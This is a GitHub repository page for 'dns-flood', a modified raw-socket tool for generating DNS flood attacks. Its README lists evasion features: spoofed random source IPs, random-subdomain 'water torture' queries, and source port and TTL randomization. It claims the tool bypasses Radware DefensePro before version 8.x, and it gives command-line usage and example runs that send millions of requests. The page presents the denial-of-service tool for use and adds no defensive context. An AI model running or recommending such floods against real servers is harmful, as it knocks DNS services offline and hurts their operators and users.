Skip to content

Original DNS-Flood tool found on code.google.com

Notifications You must be signed in to change notification settings

hawell/dns-flood

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

25 Commits
 
 
 
 
 
 

Repository files navigation

dns-flood

Original DNS-Flood tool found on code.google.com

This is modified version od DNS-Flood tool. Use raw sockets to generate DNS flood attack.

Original Here: https://code.google.com/p/dns-flood/

In contrast to original tool it provides:

  • Change to use /dev/urandom as the random seed
  • Make the Query comply with RFC 1035
  • Subdomain part of query randomization aka DNS Water Torture
  • Change default ephemeral port range comply with RFC 6056;
  • Add feature to select ephemeral port range between 0 - 65535 or 1024 - 65535;
  • Add feature to specific source port number, include port 0
  • Source port and TTL randomization
  • Additional query types like AAAA and MX
  • DNSSEC query support

The tool is able to bypass Radware DefensePro SW version prior to 8.x.

How to install

  1. Clone Repo
  2. Run Make
  3. Enjoy Kittens

How to run

Usage:

./dnsflood <query_name> <destination_ip> [options]  
	Options:  
	-t, --type		query type  
	-s, --source-ip		source ip  
	-p, --dest-port		destination port  
	-P, --src-port		source port  
	-i, --interval		interval (in microseconds) between two packets  
	-n, --number		number of DNS requests to send  
	-d, --duration		run for at most this many seconds   
	-r, --random-src	fake random source IP
	-R, --random-sub	prefix with random subdomain names
	-S, --dnssec		make a dnssec query
	-D, --daemon		run as daemon  
	-h, --help		print this message   

Example:

$ ./dnsflood abf.auction.co.kr 127.0.0.1 -d 30
sent 5333186 DNS requests in 30.000000 sec.
$
$ ./dnsflood abf.auction.co.kr 10.40.196.84 -n 5000000
sent 5000000 DNS requests in 28.000000 sec.
$

Credits for original version

Original DNS-Flood tool found on code.google.com

Use raw sockets to generate DNS flood attack.

Original Here: https://code.google.com/p/dns-flood/

About

Original DNS-Flood tool found on code.google.com

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • C 98.1%
  • Makefile 1.9%